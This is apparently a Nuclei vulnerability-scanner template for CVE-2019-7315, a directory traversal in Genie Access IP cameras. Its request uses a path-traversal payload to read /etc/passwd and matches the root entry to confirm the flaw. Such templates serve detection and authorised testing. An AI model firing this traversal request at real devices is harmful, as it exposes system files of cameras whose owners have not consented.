nuclei-templates/cves/2019/CVE-2019-7315.yaml

33 lines
974 B
YAML

id: CVE-2019-7315
info:
name: Genie Access WIP3BVAF IP Camera - Directory Traversal
author: 0x_Akoko
severity: high
description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow.
reference:
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
- https://vuldb.com/?id.136593
- https://www.cvedetails.com/cve/CVE-2019-7315
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-7315
cwe-id: CWE-22
tags: cve,cve2019,camera,genie,lfi,iot
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200